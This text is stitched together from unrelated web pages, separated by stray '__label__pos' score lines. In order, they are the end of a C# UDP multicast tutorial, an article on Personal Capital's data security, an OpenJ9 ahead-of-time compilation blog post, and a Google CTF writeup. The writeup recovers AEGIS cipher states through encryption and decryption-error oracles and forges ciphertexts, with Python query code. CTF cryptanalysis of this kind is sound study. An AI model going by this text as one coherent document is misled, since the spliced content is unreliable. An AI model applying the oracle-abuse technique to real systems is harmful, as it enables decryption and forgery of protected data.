byte[] sdata = Encoding.ASCII.GetBytes(msg);
publisher.Send(sdata,sdata.Length);
System.Threading.Thread.Sleep(5000);
}
}
}
Compile and start stockpricemulticaster.
The next program (stockpricereceiver.cs) joins the group of address 230.0.0.1, receives 10 stock prices and then leaves the group:
using System;
using System.Net;
using System.Net.Sockets;
using System.Text;
class StockPriceReceiver{
public static void Main(){
UdpClient subscriber = new UdpClient(8899);
IPAddress addr = IPAddress.Parse("230.0.0.1");
subscriber.JoinMulticastGroup(addr);
IPEndPoint ep = null;
for(int i=0; i<10;i++){
byte[] pdata = subscriber.Receive(ref ep);
string price = Encoding.ASCII.GetString(pdata);
Console.WriteLine(price);
}
subscriber.DropMulticastGroup(addr);
}
}
Compile and run stockpricereceiver.
License
This article has no explicit license attached to it but may contain usage terms in the article text or the download files themselves. If in doubt please contact the author via the discussion board below.
A list of licenses authors might use can be found here
Share
About the Author
.NETian
Software Developer (Senior) Buyagift Limited.
United Kingdom United Kingdom
Having completed my Bsc(Hons) in Computing from Staffordshire University U.K and Masters in Software Development and Security from Birmingham City University. I am now working as a Senior Software Engineer at Buyagift Limited - UK.
Mubashir Afroz.
Buyagift Ltd.
www.buyagift.co.uk
---------------------
You may also be interested in...
Comments and Discussions
QuestionChat Application without server/client relation Pin
Member 781598522-Sep-11 20:26
memberMember 781598522-Sep-11 20:26
General General News News Suggestion Suggestion Question Question Bug Bug Answer Answer Joke Joke Rant Rant Admin Admin
Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
| Advertise | Privacy | Terms of Use | Mobile
Web03 | 2.8.150901.1 | Last Updated 11 Jun 2005
Article Copyright 2005 by .NETian
Everything else Copyright © CodeProject, 1999-2015
Layout: fixed | fluid
|
__label__pos
| 0.970821 |
Wallet Hacks
Is Personal Capital Safe? Personal Capital Security Explained
I use Personal Capital on a monthly basis to collect my net worth information. I've been at it for over a decade.
When I tell people I use a tool to do it, they all ask me the same question – is Personal Capital safe?
Security is one of the biggest concerns people have with any financial aggregator or tool. Whether it's Mint, Personal Capital, or some other service – putting your data into the “cloud” can be unnerving. This is especially true given how many hacks we've seen recently. Equifax, one of the biggest credit reporting agencies, was hacked and 143 million consumers had their data stolen. It was enormous.
How do you know that your data is going to be safe at another company?
It comes down to two key parts – how do they safeguard your information when they have it and how do they safeguard the transmission of your information while they get it.
Two Key Security Areas
When it comes to financial apps and security, there are two key pieces to look at:
1. How Safe is My Data – When you give the tool your data, how is it stored and protected? What is stored and where is it stored? How are the employees monitored to prevent any kind of theft?
2. How Safe is the Connection – When you communicate with the tool, how secure is that connection? When you log in, when you view your data, when you update anything, when you give them your credentials… the transmission of that data is subject to risk.
The information you put into the system has to be safe in its place of storage. The way you communicate that information must also be secure.
How Safe Is My Data in the Cloud?
One of the biggest concerns people have with tools like Personal Capital is having their data in the “cloud.”
I reached out to David M. Parker, Asst. Prof., Div. of Accounting & Finance and Director, Center for the Study of Fraud and Corruption at Saint Xavier University, for his thoughts on services like Mint and Personal Capital. He shared some valuable thoughts on how to weigh the the potential risks and rewards of using cloud-based tools:
David M. Parker, Asst. Prof., Div. of Accounting & Finance and Director, Center for the Study of Fraud and Corruption
With regard to general thoughts about storing data in the cloud by giving your data to Amazon, Microsoft, Dropbox, Equifax, your bank, Google, Facebook, or whoever… is it safe? Recent news items reveal the many, many companies that have suffered data breaches at the hands of cybercriminals.
Can your data be stolen if you hand it over to the cloud? Yes.
So, you decide to keep your data safe at home. Can it be stolen? Also yes. Cybercriminals can break in to your home computer, your home wi-fi, your Internet-enabled thermostat or doorbell, etc.
Points in favor of the cloud include that a big company like Amazon or Microsoft might have more resources and be better at defensive security that you are at home. And, certainly, it is in the best interest of their business to do their best to remain secure. They also offer redundant storage to an extent you would not have just storing your data at home where your hard drive could blow up or your house burn down with your data in it. So, it is often an acceptable risk.
I have no direct personal experience with Mint or Personal Capital. My understanding of these third party financial data aggregator services is that they work by gathering all your financial data into one place and offering their clients the resulting convenience of the nice graphs and charts. This means they need to work with your bank, broker, etc. to get access to your transactions. The extent and type of access they will be able to get may depend on whether the financial institution views them as a partner or a competitor.
An issue that comes to my mind is the size of the attack surface. If your bank and your aggregator both have a copy of your information it gives the criminal two possible targets from which to steal it. Also, if all of your information is collected at one spot, rather than having to break into multiple accounts the criminal now has one-stop shopping.
There will always be risks. No system will ever be perfectly secure. There will always be vulnerabilities and bad people willing to exploit them. But, it always comes down to an individual judgment about whether the risk is reasonable or minimal compared with the benefit of the service.
Your data isn't 100% safe at home and it isn't 100% safe in the cloud.
But the companies that you trust with your data will have safeguards in place (“defensive security”) to protect you.
Let's take a closer look at Personal Capital and what they do to secure your data.
How Safe Is My Data at Personal Capital?
Are you worried about your data being stored on Personal Capital servers?
The guy you want to talk to when it comes to security at Personal Capital is Fritz Robbins. He is their Chief Technology Officer and Chief Information Officer. He has over 20 years of experience in their field including a three-year stint as a System Architect at RSA Security and 8 years running his own full-lifecycle software engineering company. He holds an M.S. in Computer Science from Stanford University to boot.
(also, for what it's worth, Personal Capital's Founder Bill Harris co-founded PassMark Security, a company that built online authentication systems used by most major banks, and Fritz Robbins was with that company as well)
I asked Fritz about security and he mentioned a few of the points I'll dive deeper on below:
Fritz Robbins, CTO/CIO of Personal Capital
Our point of view is that viewing your banking and brokerage accounts via Personal Capital is *safer* than going directly to the banking/brokerage site from your browser. You touched on many of the reasons why:
1. Your credentials are stored in a secure data center versus always being transmitted via the user's (generally less-secure) browser
2. The connection is read-only and no money can be transferred out of your banking/brokerage account via Personal Capital, and your banking/brokerage passwords are never returned to your browser from our servers.
3. Our service gives you notification of all banking/brokerage transactions (via email or mobile push notifications) that make it easy for you to monitor you banking/brokerage accounts for fraud, all in one place!
Not for nothing but knowing the security chops of the team behind Personal Capital gives me confidence they're on top of their game.
There are two ways that Personal Capital keeps your data safe:
Quick Primer on Encryption
(click to expand this section & read a primer on encryption)
Encryption is fascinating. The basic idea behind encryption is that you have two keys, a public key and a private key.
If you want to encrypt something that only I can read, you need my public key. You encrypt your message with my public key and then give the encrypted message. The only way to decrypt it is by using my private key (which I would never share). If I want to send you something encrypted, I will need your public key to encrypt it. Then only you can decrypt it using your private key.
Fundamentally, modern encrypted communications all work this way. There are variations to make it more secure, depending on your needs (more hoops = more secure = more time).
For example, one classic variation is to rely on “session” keys rather than “permanent” ones. It's like using a temporary credit card number rather than your actual one. For every conversation, you create new keys that expire after the session is over.
Another variation is how we get the public keys to one another. We can just publish them, and that's typically fine, or we can use what's known as the Elliptic Curve Diffie-Hellman (ECDHE) key exchange. It's more temporary keys that only the two of us would use for this single session. This is what Personal Capital uses.
AES-256 is seriously serious encryption.
When you enter your bank credentials into Personal Capital, they encrypt it with AES-256 with multi-layer key management, which includes rotating user-specific keys and salts. AES-256 is the Advanced Encryption Standard (AES) and is the gold standard as determined by NIST, the United States National Institute of Standards and Technology. 256 refers to the length of the key used and 256-bits is a longest. It is also the same encryption used by the US Government.
They never store your financial login credentials. That data is encrypted and stored at Envestnet Yodlee, a platform that powers a laundry list of financial services and wealth management tools and companies. Yodless is periodically audited by the Office of the Comptroller of the Currency and their security processes are available here.
As for internal access controls, no one at Personal Capital has access to your credentials. Zero.
How Safe is the Connection with Personal Capital?
Your data is safe and encrypted on their servers, but it needs to get there first without someone peeking.
That's where encryption plays yet another role.
All of your online interaction with Personal Capital is encrypted, so no one can decipher what you're communicating with Personal Capital servers. They prefer TLS 1.2 but also suppoert TLS 1.1 and TLS 1.0. They do not allow other less-secure protocols. In encryption, you need to exchange keys during a session of communication and they use ECDHE key exchange for Perfect Forward Secrecy (read the encryption primer for more information).
They also require 2-factor authorization. This means that if you log in from an unknown or new device, they will confirm it's you via your phone or email (you pick when you set it up). I feel it's a must for any financial institution and there are some banks who don't have this yet!
Finally, their apps are tested by NowSecure and the AppSecure certification process.
How Personal Capital Protects Against Fraud
To this point, we've talked only about how Personal Capital protects you and your data. What if the data is bad?
What if your credit card gets used in a fraudulent way? Personal Capital monitors your transactions and can send you a Daily Transaction Monitor email that lists everything it has seen that day. Rather than reviewing your statement at the end of the month, you review it daily when your memory is fresh. You may not remember a transaction from two weeks ago but if it happened today, you will.
I personally set transaction notifications for any amount above $0 or $1 (depends on the card, some won't let you do $0), but this is a good alternative if you feel that level of notifications is overkill (it probably is).
Is Personal Capital Safe?
Yes, Personal Capital could actually be safer than your bank.
(This is the concern that worries people the most.)
How is Personal Capital going to be safer than your bank?
They do everything your bank does plus more, in some cases:
1. It's read-only. When you connect your accounts to Personal Capital, Personal Capital can't do anything except read the data. You can't transfer funds.
2. It's not an appealing target. It's read-only and your credentials are stored elsewhere (Yodlee).
3. It has 2-factor authorization. Not all banks have 2-factor authorization (stunning but true) but Personal Capital does. It's an extra and necessary layer of security.
4. They encrypt everything to 256 bits. Against a brute force attack, it would take 1 billion billion years.
5. One point of access for multiple banks means you don't have to log into each of those banks individually. In fact, when you log into your Personal Capital, you never have to enter your bank credentials so it never gets transmitted. If your computer is compromised by malware or a keylogger, your financial accounts are secure.
Nothing Is 100% Safe
As they say, the only thing that's 100% safe is abstinence.
Nothing else is 100% safe. Personal Capital is not 100% safe.
If you add another layer to the system, it's another layer that can be attacked.
That said, you have to weight the benefits you get from using them (you can read my Personal Capital review to see everything I like and dislike about them) versus the small chance they could be attacked.
I am personally comfortable with using them but that's ultimately for you to decide. They have put all the proper protections in place, often higher standards than is required, and that's good enough for me.
Check out Personal Capital
|
__label__pos
| 0.621784 |
Intro to Ahead Of Time Compilation
This post is meant to serve as an introduction to Ahead Of Time (AOT) compilation in OpenJ9. It does not delve too deeply into the technical details and subtleties involved in implementing AOT compilations; these will be covered in future blog posts. In this post, AOT can refer to either the AOT Compilation or the infrastructure surrounding it.
What is an AOT Compilation?
AOT compilation, in the context of OpenJ9, generally refers to a Java method implemented as bytecodes that was compiled and stored to the Shared Class Cache (SCC). An AOT compilation is performed by the compiler in one JVM instance and subsequently gets used by the compiler in another JVM instance1. This is in direct contrast to Just In Time (JIT) compilation, which implies that the compilation of a Java bytecode method was performed by the compiler in the currently running JVM instance and not shared with any other JVM instances.
Why have AOT Compilations?
The benefits of AOT compilations are improved application startup time, and reduced CPU usage. For more information on the benefits of AOT code, take a look at some OpenJ9 Performance Results. As you can imagine, if a bunch of Java bytecode methods have already been compiled, then the compiler does not need to waste CPU cycles compiling those methods again, and instead, the JVM can just load those methods and start running them – at least that’s the simplified idea. In this manner, it is theoretically possible to get an application up to its peak steady state performance much faster because there is no need to wait for the JVM to “warm up”. But, of course, it’s more complicated than that.
How to AOT?
At a very high level, making use of AOT involves two main steps:
1. Populate the SCC with AOT compiled code
2. Load the AOT compiled code and run it
Let’s take a closer look at these two steps.
Populate the SCC with AOT compiled code
To populate the SCC with AOT compiled code at least one JVM needs to actually do the work to compile all the Java bytecode methods. Thus, while AOT does save CPU usage and improves startup, that is only true for every subsequent JVM invocation, known as the “warm run”; the very first run in which the JVM does the compilation work is known as the “cold run”.
Now that we’ve sorted out that technicality, we need to deal with the more fundamental problem of getting AOT compilations functional. If a Java bytecode method was compiled by one JVM, how can a different JVM run that code as is? Well, in order to allow another JVM to run AOT code, two actions need to be performed.
1. All assumptions made during the compilation of a method need to be validated to ensure they are still true.
2. All appropriate code locations need to be relocated in order to be capable of running in a different address space.
Thus, a fundamental difference between an AOT and a JIT compilation is that the former requires the creation of Validation and Relocation Records.
Validation Records are used to ensure that the assumptions made about the environment in the “cold run” are consistent with the environment in the “warm run”. One example is to ensure that the class hierarchy of some class in the “warm run” is the same as what it was in the “cold run”. An even simpler example is to ensure that the architecture version of the machine where the AOT code is loaded is compatible with the code2.
Relocation Records are used to relocate (i.e. update) all locations in the code body that contain references to the old address space (i.e. the address space of the “cold run”) with the appropriate references that are valid in the current address space (i.e. the address space of the “warm run”). Thus, this ensures that any references to java classes, java methods, or static addresses are valid in the “warm run”.
With these Relocation and Validation records, the compiler can now generate Relocatable Code, which can be stored into the SCC for use by a different JVM.
Load the AOT compiled code and run it
As mentioned above, because the code stored in the SCC is not valid in the current environment, the JVM that loads this code needs to first relocate the code before it can run it. This involves first going through all the Validation Records to ensure that all the assumptions made in the “cold run” are still valid, and then going through all the Relocation Records to materialize the data that is valid in the current environment and patching the appropriate locations (specified by the Relocation Records) with the valid data.
With this done, the JVM can now run the code.
An Important Distinction
Static AOT involves taking a collection of classes and compiling every method in those classes prior to running any java code. Dynamic AOT, on the other hand, involves determining what methods to compile based on runtime characteristics.
OpenJ9 implements Dynamic AOT. Just as with JIT compilations, the compiler only AOT compiles methods that have been executed a certain number of times.
Conclusion
Hopefully this gives you a general understanding of the AOT process. If you’re interested in the deep technical details, stay tuned for further blog posts.
Further Reading
1. Actually, the JVM instance that compiles the AOT code also loads and runs that code. However, the code is in a form that allows it to also be loaded and run by other JVM instances.
2. In OpenJ9, this isn’t validated using a Validation Record, but rather through something known as the Feature Flags which is beyond the scope of this blog post but will be described in future blog posts.
3 comments
Leave a Reply
|
__label__pos
| 0.979687 |
Flow Hello World in XML
◷ Reading Time: 4 minutes
Modeling a Flow
The main container in Flow looks as follows:
<Flow name="FlowName" version="1.0.0.0">
<Declaration>
<!-- section to define parameters: Variables or Types -->
</Declaration>
<Nodes>
<!-- Nodes and Transitions come in this section -->
</Nodes>
</Flow>
where you can replace your name in the name setting of the model. In the Declaration section, you can define the Parameter.
Mandatory Nodes
All Flows must have at least two Nodes:
1. Start node
2. End node
And a Transition that connects the Nodes to each other:
<Flow name="FlowName" version="1.0.0.0">
<Nodes>
<Start name="startNode">
<Transition name="tr1" to="endNode"/>
</Start>
<End name="endNode" />
</Nodes>
</Flow>
In this example, we simply defined a Flow that has two nodes and one transition that connects the Start node to the End node. Please note that the End Node cannot have any Transitions.
Also, it is important that in a Flow all names must be unique (i.e., Nodes, Transitions, etc.).
Adding an Activity
The simplest way to add a task to be achieved in a Flow is using an Activity node.
<Flow name="Flow1" version="1.0.0.0">
<Nodes>
<Start name="nodeStart">
<Transition name="tr0" to="Activity1" />
</Start>
<Activity name="Activity1">
<Transition name="tr1" to="nodeEnd" />
</Activity>
<End name="nodeEnd" />
</Nodes>
</Flow>
This becomes a flow, similar to the following:
An activity in flow can either:
1. Execute an expression parameter of an Activity node
2. Be linked to other models:
1. Procedural Activity node
2. Validation Validator node
3. Decision Table Decision Table node
4. Natural Language Natural Language node
5. Decision Graph DRG node
6. Information Requirement Diagram IRD node
7. Sub-Flow CallFlow
Adding Hello World Action
In this example, we link the activity to a procedural logic. The simplest way of referencing an action to an Activity Node is referencing the Node to a procedure.
Let’s say we have the following procedure saved as HelloWorld.xml
<Procedure name="hello">
<Declaration>
<Using path="System.Console"/>
</Declaration>
<CallMethod method='Console.WriteLine("From Flow: hello world!")'/>
</Procedure>
Then using CallProc, we can reference the procedure to the node. Make sure that the Flow and Procedure models are both located next to each other.
Complete Flow Model
<Flow name="FlowRuleFlow" version="1.0.0.0">
<Nodes>
<Start name="nodeStart">
<Transition name="tr0" to="Activity1" />
</Start>
<Activity name="Activity1">
<CallProc contextMode="New" resultCopyMode="None">
<ProcSource uri="HelloWorld.xml" />
</CallProc>
<Transition name="tr1" to="nodeEnd" />
</Activity>
<End name="nodeEnd" />
</Nodes>
</Flow>
Executing a Flow
Executing the flow is easy. There are just a couple of steps that need to be followed.
1. Loading a Runtime engine
2. Calling run method of engine
private void RunHelloWorld()
{
//TODO: insert your path to the flow xml model source below, and replace YOUR_PATH_GOES_HERE with your path to your xml model source
string flowPath=YOUR_PATH_GOES_HERE;
var engine = RuntimeEngine.FromXml(File.OpenRead(flowPath));
// execute!
engine.Run();
}
Updated on December 12, 2023
Was this article helpful?
Related Articles
|
__label__pos
| 0.993839 |
I was teamed-up with @blackb6a on Google CTF this time. I have solved 7 challenges alone and 3 challenges with my teammates.
In particular, Oracle is a crypto challenge with 13 solves. It has got me spending 12 hours. All in all, it was a great experience in terms of learning, but my liver hurts. This piece of writeup may be very computation intensive, just because I would like to make everything clear.
Challenge Summary
There are two parts of the challenges. In the first part, we are required to recover an internal state for AEGIS-128L given the encryption oracle. For the second part, we are required to forge a ciphertext given an error oracle from decryption.
Solution
Part I: A brief summary for the state in AEGIS-128L
AEGIS-128L has an internal state that is initially computed solely by the key and the IV. It is of 128 bytes, broken into eight 16-byte blocks. Let's $S_i$ is updated to $S_{i+1}$ given 32-byte payload $M$. Let's define $S_i = (s_{i, 0}, s_{i, 1}, ..., s_{i, 7})$ and $M = (m_0, m_1)$. We have:
• $s_{i+1, 0} \leftarrow \text{AESEnc}(s_{i, 7}, s_{i, 0}) \oplus m_0$,
• $s_{i+1, 4} \leftarrow \text{AESEnc}(s_{i, 3}, s_{i, 4}) \oplus m_1$, and
• $s_{i+1, j} \leftarrow \text{AESEnc}(s_{i, j-1}, s_{i, j})$ for $j = 1, 2, 3, 5, 6, 7$.
But what is AESEnc? Let's see the implementation.
def aes_enc(s: block, t: block) -> block:
"""Performs the AESENC operation with tables."""
t0 = (te0[s[0]] ^ te1[s[5]] ^ te2[s[10]] ^ te3[s[15]])
t1 = (te0[s[4]] ^ te1[s[9]] ^ te2[s[14]] ^ te3[s[3]])
t2 = (te0[s[8]] ^ te1[s[13]] ^ te2[s[2]] ^ te3[s[7]])
t3 = (te0[s[12]] ^ te1[s[1]] ^ te2[s[6]] ^ te3[s[11]])
s = _block_from_ints([t0, t1, t2, t3])
return _xor(s, t)
Well... we will go through this later. Let's introduce how keystreams are generated from the state. It is (relatively) simple. The keystream $(k_{i, 0}, k_{i, 1})$ for the $i$-th round is given by:
\[ k_{i, 0} = (s_{i, 2} \wedge s_{i, 3}) \oplus s_{i, 1} \oplus s_{i, 6}, \\ k_{i, 1} = (s_{i, 6} \wedge s_{i, 7}) \oplus s_{i, 5} \oplus s_{i, 2}. \]
Part II: Recovering part of the state
Now we are given that key and IV are unchanged. This implies that the initial state, i.e., $s_{00}, s_{01}, ..., s_{09}$ are constants too.
Suppose that we have two 96-byte messages $M^{(1)}$ and $M^{(2)}$ with only the first two blocks are different (Formally, if $M^{(k)} := (m^{(k)}_{00}, m^{(k)}_{01}, ..., m^{(k)}_{21}$), then $m^{(1)}_{ij} = m^{(2)}_{ij}$ if and only if $i \neq 0$).
The following table summarizes which of the $s_{ij}$'s that would be different (marked by an !), when encrypting $M^{(1)}$ and $M^{(2)}$ respectively.
$i$ \ $j$ 0 1 2 3 4 5 6 7
0
1 ! !
2 ! ! ! !
What does this imply? Knowing that $s^{(1)}_{2,j} = s^{(2)}_{2,j}$ for $j = 2, 3, 6, 7$. Let's look closely on the last 32 bytes of the keystream:
\[ \begin{aligned} k^{(1)}_{20} \oplus k^{(2)}_{20} &= m^{(1)}_{20} \oplus c^{(1)}_{20} \oplus m^{(2)}_{20} \oplus c^{(2)}_{20} \\ &= \left[ (s^{(1)}_{22} \wedge s^{(1)}_{23}) \oplus s^{(1)}_{21} \oplus s^{(1)}_{26} \right] \oplus \left[ (s^{(2)}_{22} \wedge s^{(2)}_{23}) \oplus s^{(2)}_{21} \oplus s^{(2)}_{26} \right] \\ &= s^{(1)}_{21} \oplus s^{(2)}_{21}. \end{aligned} \]
And similarly $k^{(1)}_{21} \oplus k^{(2)}_{21} = s^{(1)}_{25} \oplus s^{(2)}_{25}$.
Why is it useful? Let's define a new function, p:
def p(s: block) -> block:
t0 = (te0[s[0]] ^ te1[s[5]] ^ te2[s[10]] ^ te3[s[15]])
t1 = (te0[s[4]] ^ te1[s[9]] ^ te2[s[14]] ^ te3[s[3]])
t2 = (te0[s[8]] ^ te1[s[13]] ^ te2[s[2]] ^ te3[s[7]])
t3 = (te0[s[12]] ^ te1[s[1]] ^ te2[s[6]] ^ te3[s[11]])
return _block_from_ints([t0, t1, t2, t3])
Déjà vu? It is more or less the same with AESEnc. We can state that AESEnc(s, t) == p(s) ^ t too. Looking even more closely, one could observe that the first four bytes from p solely depends on bytes 0, 5, 10 and 15 from s.
Knowing this, we can further expand $k^{(1)}_{20} \oplus k^{(2)}_{20}$:
\[\begin{aligned} k^{(1)}_{20} \oplus k^{(2)}_{20} &= s^{(1)}_{21} \oplus s^{(2)}_{21} \\ &= \text{AESEnc}(s^{(1)}_{10}, s^{(1)}_{11}) \oplus \text{AESEnc}(s^{(2)}_{10}, s^{(2)}_{11}) \\ &= p(s^{(1)}_{10}) \oplus s^{(1)}_{11} \oplus p(s^{(2)}_{10}) \oplus s^{(2)}_{11} \\ &= p(s^{(1)}_{10}) \oplus p(s^{(2)}_{10}) \\ &= p\left(\text{AESEnc}(s^{(1)}_{07}, s^{(1)}_{00}) \oplus m^{(1)}_{00}\right) \oplus p\left(\text{AESEnc}(s^{(2)}_{07}, s^{(2)}_{00}) \oplus m^{(2)}_{00}\right) \\ &= p(x \oplus m^{(1)}_{00}) \oplus p(x \oplus m^{(2)}_{00}). \end{aligned}\]
(We define $x := \text{AESEnc}(s_{07}, s_{00}) = s_{10} \oplus m^{(1)}_{00}$ for ease of reading.)
And now the only unknown is $x$. Can we solve it easily? Yes indeed: we can compute bytes 0, 5, 10, 15 of $x$ from the first four bytes of $k^{(1)}_{20} \oplus k^{(2)}_{20}$. Along with three more equalities from p, we are able to recover $x$ completely. I used an meet-in-the-middle approach to solve for $x$ in five seconds.
But wait. There is a problem: I am able to find 65536 candidates (or even more) instead of 1, but I am unable to eliminate the rest. The possible number of states will be growing exponentally! What can I do? The solution is actually simple: Just send $M^{(3)}$ and compute another solution set of $x$. After all, it is very likely that $x$ is the only element in the intersection of the two sets. With $x$, we are able to compute $s_{10}$ (respectively $s_{14}$).
Part III: Finishing the first part of the challenge
We can extend the above idea to leak more. By sending two 128-byte messages with blocks 3 and 4 being different, we are able to recover $s_{20}$ and $s_{24}$. We are able to leak $s_{30}$ and $s_{34}$ with the same idea.
Two more questions remain: How is it made possible in seven queries? And more importantly, how can we recover $s_{ij}$ for all $j$, for some $i$ (preferably $i = 0\ \text{or}\ 1$)?
Challenge 1. Recover the above states in 7 queries.
In short, we are encrypting these seven plaintexts (each 0 represents 16 \x00's, etc):
1. 0000000000
2. 0000110000
3. 0000220000 - Derive $s_{10}$ and $s_{14}$ uniquely with (1) and (2)
4. 0000001100
5. 0000002200 - Derive $s_{20}$ and $s_{24}$ uniquely with (1) and (4)
6. 0000000011
7. 0000000022 - Derive $s_{30}$ and $s_{34}$ uniquely with (1) and (6)
Challenge 2. Recover $s_{1, j}$ for all $j$.
From above, we are able to derive $s_{i, 0}$ and $s_{i, 4}$ for $i = 1, 2, 3$ with $m_{ij} = 0$. Hence, the state transition would be $s_{i+1, j} \leftarrow p(s_{i, j-1}) \oplus s_{ij}$ for all $i, j$. Equivalently $s_{i, j-1} = p^{-1}(s_{i+1, j} \oplus s_{ij})$.
We are able to compute inverses of $p^{-1}$ easily. Solving system of linear equations would be all good, but I'm doing it with meet-in-the-middle. Code reuse for the win! For now, let's visualize how $s_{1, j}$'s can be derived.
digraph { graph [bgcolor="transparent"] node [color="#ffe4e1", fontcolor="#ffe4e1", fillcolor="#33333c", style="filled"] edge [color="#ffe4e1", fontcolor="#ffe4e1"] rankdir=BT s₁₀[fillcolor="#55555c", style="filled"] s₁₄[fillcolor="#55555c", style="filled"] s₂₀[fillcolor="#55555c", style="filled"] s₂₄[fillcolor="#55555c", style="filled"] s₃₀[fillcolor="#55555c", style="filled"] s₃₄[fillcolor="#55555c", style="filled"] s₂₀ -> s₂₇ s₃₀ -> s₂₇ s₂₄ -> s₂₃ s₃₄ -> s₂₃ s₁₄ -> s₁₃ s₂₄ -> s₁₃ s₁₃ -> s₁₂ s₂₃ -> s₁₂ s₁₀ -> s₁₇ s₂₀ -> s₁₇ s₁₇ -> s₁₆ s₂₇ -> s₁₆ s₁₂ -> s₁₁ s₁₃ -> s₁₁ s₁₆ -> s₁₁ s₁₆ -> s₁₅ s₁₇ -> s₁₅ s₁₂ -> s₁₅ }
After all, the first part of the challenge is done.
Part IV: AEGIS-128 vs AEGIS-128L
For the second part, AEGIS-128 is used. The state is now 80 bytes (five 16-byte blocks). The payload size has been reduced to one block (let's denote it by $m$). This is how the state transited:
• $s_{i+1, 0} \leftarrow p(s_{i, 4}) \oplus s_{i, 0} \oplus m$, and
• $s_{i+1, j} \leftarrow p(s_{i, j-1}) \oplus s_{i, j}$ for $1 \leq j \leq 4$.
Moreover, the keystream $k_i$ for the $i$-th round is also altered: $k_i = (s_{i, 2} \wedge s_{i, 3}) \oplus s_{i, 1} \oplus s_{i, 4}$.
Part V: Exploring the challenge
I have no idea what's going on, so I decided to recover the printable secret_plaintext first.
It is pretty easy, and is made possible because we are able to receive the error from the oracle. In particular, from pt.decode("ascii").
We are able to recover the plaintext with bit-flipping. To begin with, we can flip the whole ciphertext by \x80. The first 32 bytes for the plaintext would be flipped by \x80 as well. If we send the flipped ciphertext (denote by $c_?$) to the oracle, we will obtain:
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe7 in position 0: ordinal not in range(128)
This means that the first byte of the flipped plaintext would be \xe7. Hence, the first byte of the plaintext is \x67 (g). We then flip the first byte of $c_?$ by \x80 and send it to the oracle, we will be receiving another error:
UnicodeDecodeError: 'ascii' codec can't decode byte 0xc6 in position 1: ordinal not in range(128)
This recovers the second byte - x46 (F). Since the secret plaintext is 96-byte long, we can recover it with 96 oracle calls.
REMAINING ORACLE CALLS: 231 - 96 = 135.
With a plaintext recovered, it is time for us to try to recover the internal state. Can we devise a similar strategy that is similar to the first part of the challenge? Formally, what will happen if we have two 48-byte messages $M^{(1)} := (m^{(1)}_0, m^{(1)}_1, m^{(1)}_2)$ and $M^{(2)} := (m^{(2)}_0, m^{(2)}_1, m^{(2)}_2)$ with only the first block being different. Then the last 16 bytes in the keystream will be:
\[ \begin{aligned} k^{(1)}_2 \oplus k^{(2)}_2 &= \left[ (s^{(1)}_{22} \wedge s^{(1)}_{23}) \oplus s^{(1)}_{21} \oplus s^{(1)}_{24} \right] \oplus \left[ (s^{(2)}_{22} \wedge s^{(2)}_{23}) \oplus s^{(2)}_{21} \oplus s^{(2)}_{24} \right] \\ &= s^{(1)}_{21} \oplus s^{(2)}_{21} \\ &= p(s^{(1)}_{10}) \oplus s^{(1)}_{11} \oplus p(s^{(2)}_{10}) \oplus s^{(2)}_{11} \\ &= p(s^{(1)}_{10}) \oplus p(s^{(2)}_{10}) \\ &= p\left(\text{AESEnc}(s^{(1)}_{04}, s^{(1)}_{00}) \oplus m^{(1)}_1\right) \oplus p\left(\text{AESEnc}(s^{(2)}_{04}, s^{(2)}_{00}) \oplus m^{(2)}_1\right) \\ &= p(x \oplus m^{(1)}_0) \oplus p(x \oplus m^{(2)}_0). \end{aligned} \]
Hereby denote $x := \text{AESEnc}(s_{04}, s_{00}) = s_{10} \oplus m^{(1)}_0$. Simply put, if we have the ciphertexts for $M^{(1)}$ and $M^{(2)}$ (denote it as $C^{(k)} = (c^{(k)}_0, c^{(k)}_1, c^{(k)}_2)$), we are able to recover one-fifths of the state if this happens.
How are we able to do it? Well actually, we have recovered the secret plaintext above. We can flip the first block of the ciphertext arbitrarily (to $C_?$).
However, since $k^{(2)}_2$ is altered, the third block of the message would be updated. Luckily we are able to recover the message in 17 oracle calls. Here's how:
1. Sends $C_?$. We will obtain something like this: UnicodeDecodeError: 'ascii' codec can't decode byte 0xe8 in position 34...
2. Flips the 35th byte by \xe8 in $C_?$. Sends the patched $C_?$: UnicodeDecodeError: 'ascii' codec can't decode byte 0xcb in position 35...
3. Flips the 36th byte by \xcb in $C_?$. Repeat the process until we receive OK, meaning that the plaintext is now ASCII-encoded.
4. For now, we have recovered a subset of message bytes. We then flip the unknown bytes by \x80 (for example, bytes 33 and 34) to throw errors from the oracle.
5. Repeat step 1 until all unknown bytes are recovered.
In short, we spent 16 oracle calls to recover the message, and one oracle call to indicate us to flip all the bytes those were originally printable. We are then able to recover a possible set of $s_{10}$ with 65536 entries (or more). We can spend another 17 queries to find the actual $s_{10}$, however.
REMAINING ORACLE CALLS: 135 - 17×2 = 101.
With the same idea, we can recover $s_{20}, s_{30}, s_{40}$ with 17×6 queries. This would allow us to recover $s_{10}, s_{11}, ..., s_{14}$ and hence forging arbitrary messages (along with a slightly longer AD).
REMAINING ORACLE CALLS: 101 - 17×6 = -1.
Shoot - we are one query short. Since we are able to recover one byte of the plaintext in each of the queries, so it doesn't hurt to sacrifice one oracle calls by guessing one byte. So... in theory, we are able to finish the challenge with once every 256 times.
Luckily, if we are given a incorrect plaintext (actually keystream), we are unable to recover a single $s_*$. That's pretty good, we are able to solve the challenge every time.
REMAINING ORACLE CALLS: -1 + 1 = 🎉.
With the exploit script written, I am able to reach the very end locally. Congratulations to me!
Part VI: Wait... Aren't we done?
No... When I am interacting to the server, I am always disconnected while sending one of the 231 oracle calls. Asking the organizers in IRC, knowing that there was an 1-minute timeout - it was later increased to 10 minutes. Unfortunately, my solution runs for around 5 minutes. I have two choices:
1. Wait until the challenge has a 10-minute timeout, or
2. Optimize the script and have it completed in one minute.
Seeing that there are already few teams solving the challenge, I think (2) would be fun.
6.1. Reducing online complexity
For inputs that does not require immediate feedbacks, we can send them at the same time. This is an example when I am recovering secret_plaintext in the second part.
# Before optimization
test_ciphertext = bytes([c^0x80 for c in ciphertext])
m0 = b''
for i in range(96):
r.sendline(base64.b64encode(test_ciphertext))
test_ciphertext = cxor(test_ciphertext, i, 0x80)
p, mc = try_decrypt_read(r)
assert p == i
m0 += bytes([mc^0x80])
# After optimization
test_ciphertext = bytes([c^0x80 for c in ciphertext])
m0 = b''
for i in range(96):
r.sendline(base64.b64encode(test_ciphertext))
test_ciphertext = cxor(test_ciphertext, i, 0x80)
for i in range(96):
p, mc = try_decrypt_read(r)
assert p == i
m0 += bytes([mc^0x80])
